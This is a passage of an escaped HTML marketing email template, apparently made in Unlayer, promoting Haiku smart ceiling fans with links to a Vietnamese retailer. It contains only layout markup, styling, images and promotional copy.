.u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_2 .v-text-align { text-align: center !important; } #u_content_image_2 .v-src-width { width: auto !important; } #u_content_image_2 .v-src-max-width { max-width: 60% !important; } #u_content_image_3 .v-src-width { width: auto !important; } #u_content_image_3 .v-src-max-width { max-width: 60% !important; } #u_content_image_4 .v-src-width { width: auto !important; } #u_content_image_4 .v-src-max-width { max-width: 60% !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Playfair+Display:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Cabin:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Crimson+Text:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fdf4ef;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fdf4ef;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fdf4ef;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #bfd8d2;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #bfd8d2;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121551729-logo-baf.gif\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 28%;max-width: 162.4px;\\\" width=\\\"162.4\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:80px 10px 15px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: inherit; font-weight: 400; color: #e67e23; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'Playfair Display\', serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px;\\\"><strong>HAIKU<\\/strong><\\/span><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px; font-family: Cabin, sans-serif;\\\"><span style=\\\"font-family: \'Playfair Display\', serif; line-height: 28px;\\\"><span style=\\\"line-height: 28px;\\\"><strong>The Smart Ceiling Fan of the Future - Big Ass Fans<\\/strong><\\/span><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 30px 80px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\" style=\\\"height:37px; v-text-anchor:middle; width:114px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#c97a14;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #c97a14; background-color: #ffffff; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">Let\'s Start<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 40px 0px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #c97a14; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: \'Crimson Text\', serif; font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\">H E L L O<\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'Crimson Text\', serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>HAIKU SMART FANS<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 30px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #a5a5a5; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">You deserve a ceiling fan that adds to the beauty of your home and makes your life simpler. Handcrafted with premium materials and engineered with cutting-edge smart home technology, Haiku represents the pinnacle in style and innovation for ceiling fans. More than 75 international awards attest to its quality, while its world-leading efficiency makes it the perfect choice for energy-conscious homeowners.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" style=\\\"height:37px; v-text-anchor:middle; width:197px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#c97a14\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #c97a14; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Read More Haiku Fans<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 40px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"57%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #b6b6b6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 7px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122542378-h-1.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 80%;max-width: 146.4px;\\\" width=\\\"146.4\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 